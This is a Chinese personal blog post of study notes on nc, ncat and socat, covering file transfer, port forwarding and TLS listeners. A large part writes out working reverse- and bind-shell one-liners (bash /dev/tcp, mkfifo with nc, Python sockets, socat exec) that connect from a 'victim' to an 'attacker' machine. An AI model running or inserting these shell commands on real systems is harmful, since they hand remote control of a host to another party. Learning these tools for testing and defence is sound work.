<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="https://images.atsud0.me/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://images.atsud0.me/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="https://images.atsud0.me/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="https://images.atsud0.me/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"atsud0.me","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="nc体积小，功能强大,跨平台，有了nc就不需要telnet了。nc可以完成telnet的所有工作.socat 和nc相似的瑞士军刀frp 多用于内网穿透nc下载  32位比64位更稳定些。">
<meta property="og:type" content="article">
<meta property="og:title" content="nc,socat,frp笔记">
<meta property="og:url" content="http://atsud0.me/2020/04/24/netcat-socat%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="雪之下二丁目鹤岗八幡宫">
<meta property="og:description" content="nc体积小，功能强大,跨平台，有了nc就不需要telnet了。nc可以完成telnet的所有工作.socat 和nc相似的瑞士军刀frp 多用于内网穿透nc下载  32位比64位更稳定些。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://images.atsud0.me/images/post/Screenshot_20200417_101430.jpg">
<meta property="og:image" content="https://images.atsud0.me/images/post/image-20201126132609324.png">
<meta property="og:image" content="https://images.atsud0.me/images/post/20210325-22:32:43-_4DwS8R_er9XYY.jpg">
<meta property="og:image" content="https://images.atsud0.me/images/post/20210325-23:06:25-_2MlS8T_o5gws4.png">
<meta property="og:image" content="https://images.atsud0.me/images/post/20210325-23:08:16-_P0WFbb_XWYPeZ.png">
<meta property="article:published_time" content="2020-04-24T10:37:48.000Z">
<meta property="article:modified_time" content="2021-04-10T07:24:38.784Z">
<meta property="article:author" content="atsud0">
<meta property="article:tag" content="nc">
<meta property="article:tag" content="ncat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://images.atsud0.me/images/post/Screenshot_20200417_101430.jpg">

<link rel="canonical" href="http://atsud0.me/2020/04/24/netcat-socat%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>nc,socat,frp笔记 | 雪之下二丁目鹤岗八幡宫</title>
  
    <script>
      function sendPageView() {
        if (CONFIG.hostname !== location.hostname) return;
        var uid = localStorage.getItem('uid') || (Math.random() + '.' + Math.random());
        localStorage.setItem('uid', uid);
        navigator.sendBeacon('https://www.google-analytics.com/collect', new URLSearchParams({
          v  : 1,
          tid: 'UA-163969429-1',
          cid: uid,
          t  : 'pageview',
          dp : encodeURIComponent(location.pathname)
        }));
      }
      document.addEventListener('pjax:complete', sendPageView);
      sendPageView();
    </script>






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">雪之下二丁目鹤岗八幡宫</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/index.html" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">191</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">12</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">150</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://atsud0.me/2020/04/24/netcat-socat%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://images.atsud0.me/images/atsud0-avator.jpg">
      <meta itemprop="name" content="atsud0">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="雪之下二丁目鹤岗八幡宫">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          nc,socat,frp笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-04-24 18:37:48" itemprop="dateCreated datePublished" datetime="2020-04-24T18:37:48+08:00">2020-04-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-04-10 15:24:38" itemprop="dateModified" datetime="2021-04-10T15:24:38+08:00">2021-04-10</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Note/" itemprop="url" rel="index"><span itemprop="name">Note</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Note/Tools/" itemprop="url" rel="index"><span itemprop="name">Tools</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>8.6k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>8 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <blockquote>
<p>nc体积小，功能强大,跨平台，有了nc就不需要telnet了。nc可以完成telnet的所有工作.<br>socat 和nc相似的瑞士军刀<br>frp 多用于内网穿透<br><a href="https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe" target="_blank" rel="noopener">nc下载</a></p>
</blockquote>
<p>32位比64位更稳定些。</p>
<a id="more"></a>
<h3 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h3><p>nc可以做什么?</p>
<ul>
<li>传输文本信息(明文</li>
<li>传输文件/目录</li>
<li>加密传输文件</li>
<li>远程控制/木马   —-nc不会被杀毒软件查杀?</li>
<li>加密所有流量</li>
<li>流媒体服务器</li>
<li>远程克隆硬盘</li>
</ul>
<p>可以做客户端使用，也可以做服务端。</p>
<p>作为客户端时，不建议直接去解析域名，应该直接连接他的ip地址<br> -v 显示详细的连接信息<br> -n 不进行dns<br> -q 标准输入后等待x秒后退出<br> -l 开始监听<br> -p 指定端口<br> -z 端口扫描<br> -c 提供shell</p>
<p>nc的弱点:</p>
<ul>
<li>明文传输,容易被嗅探,容易被中间人劫持.</li>
<li>缺乏身份验证</li>
</ul>
<p>nc的升级版–ncat 可以使用ssl加密和允许某个ip连接</p>
<h4 id="传输文本信息"><a href="#传输文本信息" class="headerlink" title="传输文本信息"></a>传输文本信息</h4><p>服务端:<br><code>nc -lvp 1234</code></p>
<p>客户端:<br><code>nc -nv ip 1234</code></p>
<p><img src="https://images.atsud0.me/images/post/Screenshot_20200417_101430.jpg" alt="传输文本信息"></p>
<h4 id="利用nc进行收集信息"><a href="#利用nc进行收集信息" class="headerlink" title="利用nc进行收集信息"></a>利用nc进行收集信息</h4><p>A服务端:<br><code>ps -ef|nc -lvp 1234</code></p>
<p>B客户端:<br><code>nc -nv ip 1234 &gt; ps.txt</code></p>
<p>这个是由A服务端传给B客户端</p>
<p>A服务端:<br><code>nc -lvp 1234 &gt; a.txt</code><br>B客户端:<br><code>ls -l|nc -nv ip 1234</code></p>
<p>这个是由B客户端发给A服务端</p>
<p>为什么要这样进行因为电子取证的时候，要保护目标机器的原始状态，保证目标机器的文件不被损坏。</p>
<h4 id="传输文件"><a href="#传输文件" class="headerlink" title="传输文件"></a>传输文件</h4><p>将B的a.txt文件传给A</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lp 1234&gt;a.txt</span><br><span class="line">B:nc -nv ip 1234 &lt;a.txt -q 1</span><br></pre></td></tr></table></figure>

<p>将A的2.sh文件传给B</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lp 1234 &lt;2.sh</span><br><span class="line">B:nc -nv ip 1234 &gt;c.txt -q 1</span><br></pre></td></tr></table></figure>

<h5 id="加密传输文件"><a href="#加密传输文件" class="headerlink" title="加密传输文件"></a>加密传输文件</h5><p>A机器监听端口等待文件上传解密<br>B机器上的a.nmap加密后传送给A机器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lvp 1234|mcrypt --flush -Fbqd -a rijndael-256 -m ecb &gt; b.nmap</span><br><span class="line">B:mcrypt --flush -Fbq -a rijndael-256 -m ecb&lt;a.nmap|nc -nv ip -q 1</span><br></pre></td></tr></table></figure>

<h4 id="传输目录"><a href="#传输目录" class="headerlink" title="传输目录"></a>传输目录</h4><p>将A机器的目录打包后传输给B机器解包</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:tar cvf - .&#x2F;aaa | nc -lvp 1234 -q 1</span><br><span class="line">B:nc -nv ip 1234 | tar xf - .&#x2F;</span><br></pre></td></tr></table></figure>


<p>反向连接，B机器等待A上线发送文件包并解压</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:tar cvf - .&#x2F;aaa |nc -nv ip 1234</span><br><span class="line">B:nc -lvp 1234|tar xf - .&#x2F;</span><br></pre></td></tr></table></figure>

<h5 id="加密传输目录"><a href="#加密传输目录" class="headerlink" title="加密传输目录"></a>加密传输目录</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lvp 1234|mcrypt --flush -Fbqd -a rijndael-256 -m ecb|tar xvf -</span><br><span class="line"></span><br><span class="line">B:tar cvf - .&#x2F;aaa |mcrypt --flush -Fbq -a rijndael-256 -m ecb|nc -nv ip 1234 -q 1</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:tar cvf - .&#x2F;Downloads|mcrypt --flush -Fbq -a rijndael-256 -m ecb|nc -lvp 1234 -q 1</span><br><span class="line">B:nc -nv ip 1234|mcrypt --flush -Fbqd -a rijndael-256 -m ecb|tar xvf - .&#x2F;</span><br></pre></td></tr></table></figure>

<h4 id="流媒体服务器"><a href="#流媒体服务器" class="headerlink" title="流媒体服务器"></a>流媒体服务器</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat 1.mp4|mc -lp</span><br></pre></td></tr></table></figure>

<h4 id="扫端口"><a href="#扫端口" class="headerlink" title="扫端口"></a>扫端口</h4><p>不建议。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvz ip 1-65535</span><br></pre></td></tr></table></figure>

<h4 id="远程控制"><a href="#远程控制" class="headerlink" title="远程控制"></a>远程控制</h4><h5 id="正向"><a href="#正向" class="headerlink" title="正向"></a>正向</h5><p>A开启监听端口1234 提供bash，等待连接<br>B 连接上A，B控制A</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lp 1234 -c bash</span><br><span class="line">B:nc -nv ip 1234</span><br></pre></td></tr></table></figure>

<h5 id="反向"><a href="#反向" class="headerlink" title="反向"></a>反向</h5><p>A开启监听端口1234，<br>B连接A的，并提供shell</p>
<p>A控制B</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nc -lp 1234</span><br><span class="line">B:nc -nv ip 1234 -c bash</span><br></pre></td></tr></table></figure>

<p>为什么要使用反向而不是正向?因为在idc机房中边界一般会有防火墙,通常防火墙一般不会打开一个不常见的端口允许外部的机器来进行连接.所以要使用反向连接,让在防火墙内部的机器去连接外部的机器</p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A:nv -lvp 1234</span><br><span class="line">B:bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;ip&#x2F;1234 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<p>bash -i 打开一个bash</p>
<p>&gt;&amp; 将标准输出和标准错误输出重定向到了 /dev/tcp/ip/1234 这个远程设备上。</p>
<p>0&gt;&amp;1 代表将标准输入重定向到标准输出，但是标准输出已经被重定向到了远程设备上，所以标准输入也被重定向到了远程设备上。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|nc 1.1.1.1 1234 &gt;&#x2F;tmp&#x2F;f</span><br></pre></td></tr></table></figure>

<p>注意:/dev/tcp这个只在bash里有。</p>
<blockquote>
<p>hz大佬:所以bash为啥会有这东西啊，(bash果真就搞破坏专用（，自带一堆方便后门的工具（</p>
</blockquote>
<blockquote>
<p>过于生草..</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;bin&#x2F;bash -c &#39;$@|bash&#39; &#39;&#39; &#39;echo&#39; &#39;bash -i &amp;&gt; &#x2F;dev&#x2F;tcp&#x2F;127.0.0.1&#x2F;4444 0&lt;&amp;1&#39;</span><br></pre></td></tr></table></figure>
<p>来自<a href="https://mp.weixin.qq.com/s/CAtsX3yP81mULbMDTo0J1A" target="_blank" rel="noopener">文章</a></p>
<h4 id="python反弹"><a href="#python反弹" class="headerlink" title="python反弹"></a>python反弹</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">A：nc -lvp 8888</span><br><span class="line">B：python -c &quot;import os,socket,subprocess;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;10.10.10.10&#39;,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&#39;&#x2F;bin&#x2F;bash&#39;,&#39;-i&#39;])&quot;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import os,socket,subprocess</span><br><span class="line"></span><br><span class="line">s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line"></span><br><span class="line">s.connect((&#39;192.168.40.228&#39;,8888))  </span><br><span class="line">os.dup2(s.fileno(),0)</span><br><span class="line">os.dup2(s.fileno(),1)</span><br><span class="line">os.dup2(s.fileno(),2)</span><br><span class="line">p&#x3D;subprocess.call([&#39;&#x2F;bin&#x2F;bash&#39;,&#39;-i&#39;])</span><br></pre></td></tr></table></figure>
<p>写入到文件中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#39;import os,socket,subprocess;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.16.69&quot;,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;bash&quot;,&quot;-i&quot;])&#39;&gt;a.py</span><br></pre></td></tr></table></figure>
<h3 id="ncat"><a href="#ncat" class="headerlink" title="ncat"></a>ncat</h3><p>正向</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ncat -c bash --allow 192.168.1.2 -vnl 333 --ssl</span><br></pre></td></tr></table></figure>

<h3 id="socat"><a href="#socat" class="headerlink" title="socat"></a>socat</h3><p>攻击机IP：192.168.2.84</p>
<p>受害机IP：192.168.3.76</p>
<h4 id="简易聊天窗口"><a href="#简易聊天窗口" class="headerlink" title="简易聊天窗口"></a>简易聊天窗口</h4><p>服务端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat - tcp-listen:1234</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 -</span><br></pre></td></tr></table></figure>

<p><code>-</code>,<code>STDIN</code>,<code>STDOUT</code> 表示标准输入输出，可以用一个横杠代替。</p>
<h4 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h4><p>下面的<code>STDIN</code>表示标准输入和用一个<code>-</code>效果一样的</p>
<p>服务端通过管道符将<code>cat svmgrsvc.log</code>的输出作为标准输入传递给socat</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat svmgrsvc.log|socat tcp-listen:1234 STDIN</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 STDOUT</span><br></pre></td></tr></table></figure>

<p>如果要将服务端传过来的数据保存成文件的话，不能直接使用管道符或者是重定向</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 file:&#x2F;tmp&#x2F;c.txt,</span><br><span class="line">create</span><br></pre></td></tr></table></figure>

<p>将程序/脚本输出传递也是一样的啦</p>
<p>服务端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -ef|socat tcp-listen:1234 STDIN</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 file:&#x2F;tmp&#x2F;f.txt,create</span><br></pre></td></tr></table></figure>

<h5 id="传输文件-1"><a href="#传输文件-1" class="headerlink" title="传输文件"></a>传输文件</h5><p>服务端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp-listen:1234,fork file:&#x2F;tmp&#x2F;DidFinish.txt</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 file:&#x2F;tmp&#x2F;b.txt,create</span><br></pre></td></tr></table></figure>

<h5 id="传递目录"><a href="#传递目录" class="headerlink" title="传递目录"></a>传递目录</h5><p>服务端</p>
<p>这里<code>tar</code>的<code>-</code>也可以替换为<code>STDOUT</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar cvf - .&#x2F;aaa | socat TCP4-LISTEN:1234 STDIN</span><br></pre></td></tr></table></figure>

<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat tcp4:192.168.2.84:1234 file:&#x2F;tmp&#x2F;f.tar,create</span><br></pre></td></tr></table></figure>

<h5 id="读写分流"><a href="#读写分流" class="headerlink" title="读写分流"></a>读写分流</h5><p>实现一个假的 Web Server，客户端连过来之后就把 read.html 里面的内容传过去，同时把客户端的数据保存到 write.txt 里面。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat open:read.html\!\!open:write.txt,create,append tcp-listen:8000,reuseaddr,fork</span><br></pre></td></tr></table></figure>

<p><img src="https://images.atsud0.me/images/post/image-20201126132609324.png" alt="image-20201126132609324"></p>
<h4 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat  TCP4-LISTEN:1234,bind&#x3D;127.0.0.1,reuseaddr,fork TCP4:192.168.3.74:22</span><br></pre></td></tr></table></figure>

<blockquote>
<p>bind 绑定监听的ip，不对其进行绑定的话则默认为0.0.0.0</p>
<p>Reuseaddr绑定一个本地端口</p>
<p>fork TCP4:&lt;ip address&gt;:&lt;port&gt; 转发到的服务器ip和端口</p>
</blockquote>
<h4 id="shell"><a href="#shell" class="headerlink" title="shell"></a>shell</h4><h5 id="反向-1"><a href="#反向-1" class="headerlink" title="反向"></a>反向</h5><p>攻击机执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat -d -d TCP4-LISTEN:1234 STDOUT</span><br></pre></td></tr></table></figure>

<p>受害机执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP:192.168.2.84:1233 EXEC:&#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>

<p>这样就打开了一个简易的<code>shell</code>，但是没有标准错误输出。取决于在受害机上执行的反弹命令</p>
<p>攻击机器执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">socat file:&#96;tty&#96;,raw,echo&#x3D;0 tcp-listen:1234</span><br><span class="line"></span><br><span class="line">### 下面这条也行，取决于在受害机上执行的反弹命令</span><br><span class="line">socat TCP4-LISTEN:1234 STDOUT</span><br></pre></td></tr></table></figure>

<p>受害机执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">socat exec:&#39;bash -li&#39;,pty,stderr,setsid,sigint,sane tcp:192.168.2.84:1234</span><br><span class="line"></span><br><span class="line">或者用正常的来弹回去也行</span><br><span class="line">bash -c &#39;bash &gt;&amp;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.84&#x2F;1233 0&gt;&amp;1&#39;</span><br></pre></td></tr></table></figure>

<p>这样反弹回来的shell，是标准的终端属性。</p>
<p>在受害机上用<code>socat</code>反弹shell时，只要携带<code>stderr</code>这个参数，就有标准错误输出了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP:192.168.2.84:1233 EXEC:&#x2F;bin&#x2F;bash,stderr</span><br></pre></td></tr></table></figure>

<h5 id="正向-1"><a href="#正向-1" class="headerlink" title="正向"></a>正向</h5><p>受害机执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:1234 EXEC:&#x2F;bin&#x2F;bash</span><br></pre></td></tr></table></figure>

<p>攻击机执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat - TCP:192.168.3.76:1234</span><br></pre></td></tr></table></figure>

<p>攻击机收到的shell有没有标准错误输出什么的，这里就取决于受害机的监听命令了 同样，带上个<code>stderr</code>就好了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat TCP-LISTEN:1235 EXEC:&#x2F;bin&#x2F;bash,stderr</span><br></pre></td></tr></table></figure>

<h4 id="SOCAT加密传输"><a href="#SOCAT加密传输" class="headerlink" title="SOCAT加密传输"></a>SOCAT加密传输</h4><p>创建key</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">openssl req -newkey rsa:2048 -nodes -keyout atsud0.key -x509 -days 362 -out atsud0.crt</span><br><span class="line"></span><br><span class="line">cat atsud0.key atsud0.crt &gt;atsud0.pem</span><br></pre></td></tr></table></figure>

<p>开启加密监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat openssl-listen:1234,cert&#x3D;atsud0.pem,verify&#x3D;0 -</span><br></pre></td></tr></table></figure>

<p>如果监听用的是openssl加密，而客户端则不用的话是不能连接上的。其余用法大致和tcp一样。</p>
<p>客户端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat - openssl:192.168.2.84:1235,verify&#x3D;0</span><br></pre></td></tr></table></figure>

<p>客户端反弹shell</p>
